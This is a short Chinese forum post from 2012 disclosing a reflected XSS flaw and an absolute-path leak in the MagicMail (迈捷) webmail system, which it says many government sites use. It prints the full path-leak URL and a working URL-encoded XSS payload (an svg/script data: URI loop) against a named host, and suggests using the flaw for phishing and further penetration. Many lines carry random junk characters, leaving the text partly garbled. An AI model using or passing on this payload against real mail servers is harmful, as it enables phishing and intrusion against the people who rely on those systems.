今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞
" `7 e) K% X( l! [ e+ b* K5 Q% g7 K% |' z: X
( M3 j! X3 I. L2 S9 L- p1 P+ o包含 一个反射性XSS 以及 绝对路径泄漏
, R$ K" {( h m3 e4 k" h看了看 貌似全部是linux的。
0 \! H+ W8 N4 m * t! A2 a2 P+ K) w# x0 C) ~
关键字:迈捷邮件系统 by MagicMail" u* |' k8 @# v" Q
& l' J6 g! r& x$ e0 |
可以看到很多政府网站都用这个邮件系统
" C/ c: ^* L+ |8 t3 l/ g% n" a; k7 j( r$ s
绝对路径 http://madman.in/index.php?login_type=declare&language=5 M2 ?+ ]1 Z2 Y% x+ c
3 E1 H( t* q E. |
3 `* c& }/ H* M9 l
/ E2 x& z' D! ~) B6 Z- w; @
XSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E
3 C1 E6 ]* O$ ]( @6 `8 L
" E3 u' G* {, d0 ?8 t/ s% {4 T ]$ R0 `
H8 q5 h6 [% o& ~( q! W虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等
9 Y- m! i+ A/ [% x - W0 H% l+ X5 N+ r* L" t# I
修复方案:看官方补丁吧。/ z7 l- j6 c+ J/ z3 E
|
发表于 2012-11-9 20:38:41
收藏
支持
反对